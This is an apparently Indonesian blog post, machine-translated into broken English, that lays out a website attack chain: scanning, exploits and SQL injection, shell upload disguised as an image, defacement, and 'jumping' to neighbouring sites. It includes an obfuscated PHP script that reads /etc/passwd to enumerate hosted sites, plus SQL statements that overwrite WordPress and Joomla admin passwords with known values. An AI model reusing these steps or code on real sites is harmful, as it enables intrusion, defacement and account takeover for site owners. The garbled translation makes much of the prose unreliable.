ChatBox

Minggu, 17 Juni 2012

Web Attack

Picture of Web Attack:
Scan => XPL / sqli => Upload Shell => Deface / jumping => Rooting 

1. Scan 

Look for tau where situation weakness of goals web. Can in pake scan some scanner tool. most famous between:
Acunetix Windows 
Nikto Linux 
Besides can get our bug also with that tool will be able to collect information good for from goals web

2. XPL / sqli 

After we earn to find data of goals web. We try searching of is way of for the meng-Exploitasi of bug-bug we which have find with mentioned scanner tool. Hereunder enlist situs providing kinds of Exploit 
Exploit Database
Packet Storm 
Inj3Ct0R
Hack0Wn
If goals use CMS Joomla / wordpress, we earn to look for Exploit for plugin-plugin which in using goals web. Because with scanner tool above us given by information of will goals web have in surgical operation of all. Become soybean cake us fill folder of goals web, including plugin-plugin any kind of which is used 

If technique of SQLI earn in seeing here:
Ebook along with website sourc for the practice of technique of SQLI donlot here

3. Upload Shell 

Website have in Exploitasi and us have stepped into page yard of admin. Remain us of upload shell'a now

- Shell Upload in Wordpress can thema or plugin mengupload which have been inserted file of shell'a
- Shell Upload in is same Joomla also, merely can also use Plugin Ninja Explorer 
- Upload Shell in ordinary CMS can pass menu of upload picture, if not can try shell'a in rename become last shell.php.jpg of upload 

After success shell in upload remain to call situation of URL shell'a where

4. Deface Or Jumping 

If pengen of styles of an Deface, file searching of index.php last of file fox in dalam'a with Deface script which our. To lazy make deface scrip can use tool Defacemaker. Try website kan arshive we which have deface in situs 
- Zona-H 
Insufficient only can men-Deface one just web. Try to use technique of jumping to step into web which is one is same server of web we which have deface. way of?

Script Jumping

Code:


<?

$x15="\x61rray\137\x70\165\x73h"; $x16="f\x65\157\146"; $x17="fgets"; $x18="\146\x6f\160\145\156"; $x19="in\x69\137g\145\164"; $x1a="is\x5f\x72\145ad\141b\154e"; $x1b="\x73\x65t_t\151\155\x65\137li\155\x69t"; $x1c="\x73\x74\162\x70\157\163"; $x1d="\163\165b\x73t\x72";
($x0b = $x19('safe_mode') == 0) ? $x0b = 'off': die('<b>Error: Safe Mode is On</b>');$x1b(0);@$x0c = $x18('/etc/passwd','r');if (!$x0c) { die('<b> Error : Can Not Read Config Of Server </b>'); }$x0d = array();$x0e = array();$x0f = array();$x10 = 0;echo "\074b>\x3cfo\x6e\x74\040fa\x63\x65=\126\x65\x72\x64an\141\x20s\151\x7a\x65\075\x33 c\157\154\157\x72\x3d\x54\x65\141\x6c>\x20\123\x65\x72\166\145\x72 \x4a\x75\155\160in\x67\x20\x46\x69\x6ed\145\162 \126er\x73ion\x201.\x30\x20<\057f\157\x6et\x3e<\x2f\x62\x3e<\142\x72\040\x2f\x3e";echo "<font \146\x61\x63\145\075V\145rd\x61\x6ea s\x69\172\x65=\x32 \x63\x6fl\x6f\162\075Ma\162\x6fo\x6e\x3eC\x72\x65at\145d \x42\x79\040\x58\141\144\160\x72ito\170 \x2c \0620\061\x30,\040\124\141\156\x67\145r\x61\x6e\147 <\057\x66\157\156\x74\076\074b\x72\040\x2f>";echo "\074\142\162\x20\057\076";echo "<\142>\x3c\146o\156t\x20\146\141\x63\145=V\145\x72\144\141\x6ea \x73\x69z\x65=\062\076\104ed\x69\143\141\164\x65\144\x20\124o\x20H\141c\x6b\145\​162-\103\151\x73\141\x64\141\x6e\x65\x2e\x4fr\147\x20<\x2f\146\157n\164\076\074\x2f\142><\x62\x72 \x2f>";echo "\x3c\x66o\x6e\164\040f\141\143e\x3d\126\x65\162\x64\141n\x61\040\163\151z\x65\x3​d\x32\040\x63\157l\157\162\075\x4d\x61ro\157\156>\040\124ha\156ks\x20To\x20#\x20\104\145v\151\x6c\172c\060\x64\x65 \043\040\110\141c\x6be\x72\040\116e\167\x62\x69\145\x20\x23 \130\103\x6f\x64\145 \043 \112a\163a\153om \x23\x20\105\143h\x6f\040\043\040\x59\103L\x20#\x20\x49\x6e\144\x6fn\145sia\x6e\​x20\103\x79b\x65r \x23\040\x61\x6ed\040\x61l\x6c\x20Hack\x65\x72\040F\157\162\x75\155\040\111\x​6e In\144o\x6ee\x73\x69\141 <\057\x66\x6f\x6e\x74\x3e<\x62r /\x3e";echo "\x3c\x62r /\x3e";echo "<f\x6fnt\x20\146\x61\143\x65\x3d\126\x65\162\144a\156a \163iz\145=2\x20c\x6f\154\157\162\075\x4d\x61ro\157n\076 \x4f\x6b\054\x20L\x65\x74'\x73 B\x65g\x69n \x2e\x2e\056\x20\x3c/\x66\x6f\x6et><b\x72\x20\x2f\076";echo "\x3c\x66\x6fnt\x20f\141\143\145=\126er\144a\x6ea\x20\x73i\x7ae=\062 c\x6f\x6c\x6fr=\x54\x65al>\x2a\052\052*\052\x2a\x2a**\052\052\052\x2a***\x2a*\x2a\052\x2a\x2a**\052\x2a​*\x2a\052\052\052\052**\052***\x2a*\x2a*\x2a\052*<\x2f\146\157\156t\076\x3c\142r\x20/>";while(!$x16($x0c)){$x11 = $x17($x0c);if ($x10 > 35){$x12 = $x1c($x11,':');$x13 = $x1d($x11,0,$x12);$x14 = '/home/'.$x13.'/public_html/';if (($x13 != '')){if ($x1a($x14)){$x15($x0e,$x13);$x15($x0d,$x14);echo "\x3c\x66on\164\x20f\141\x63\x65\x3dVe\162da\156\141\x20\163\x69ze\0752\040co\154​\x6f\x72=\x52\145\x64\x3e[F\x6f\x75\156d\x20\041\135 $x14\074/\x66\157n\x74\x3e";echo "<\142\x72/\x3e";}}}$x10++;}echo "\074\x66on\x74 \146\141ce\075\x56e\x72\x64\141\x6e\141\040\x73\151z\x65\075\062 \x63\x6flo\162\x3d\124\145\x61\154\076\x2a\x2a\x2a\052\x2a*\052\052*\x2a\052*\x2​a*\052\x2a*\052**\052*\x2a**\052\x2a\x2a**\052*\052\x2a\052\x2a\052**\052**\x2a\​x2a\052</font\076<b\x72\x20\057\x3e";echo "\x3cb\162 /\076";echo "<\146\157\x6et\x20\x66\x61\x63\x65\x3dV\x65\162\x64a\x6e\x61 \163\151\x7a\145=\062\040c\157l\157\x72=M\141\x72\157\x6f\156\076\x54\x68an\x6bs​ \106\x6fr \125\x73\x69n\x67 \x54\150\x69s S\151m\160\x6c\x65\x20\124\x6f\x6f\x6c\x73.\040 \x5e_\x5e\074\057\146\157\x6et\x3e\074b\162 \x2f\076";echo "\074f\157\156t\x20\x66\141ce=V\x65rd\x61\156a\040\163\x69\172\145\x3d\062\076​<\057\x66ont\x3e";echo "<f\157n\164\040f\x61\143\145\x3d\126e\162dana\040\163iz\145=\x32\x3e\074/\146\157\156t>";

?>


- Upload script jumping'a
- Rename jadi jumpingfinder.php
- Panggil letak URL file tersebut
- Masuk ke public_html web target
- Masuk ke MySQL'a (cari acount MySQL di file config)
- Cari table user
- Update Password user admin

Under this there is special script for the update of admin password user :


# Wordpress

PHP Code:
UPDATE `note_wrdp1`.`wp_users` SET `user_pass` = '$P$BdEAI5H.T0REbjjKME506zOW03nggb0' WHERE `wp_users`.`ID` = 1 LIMIT 1;

User : admin
Pass : admin


# Joomla


PHP Code:
update `jos_users` set `password`="ece4f1e9e99fe6ca77c100d02cf4aa60" where `username`="admin";


User : admin
Pass : devilzc0de

0 komentar:

Posting Komentar

pentingnya membaca
pentingnya membaca
pentingnya membaca
pentingnya membaca
pentingnya membaca
pentingnya membaca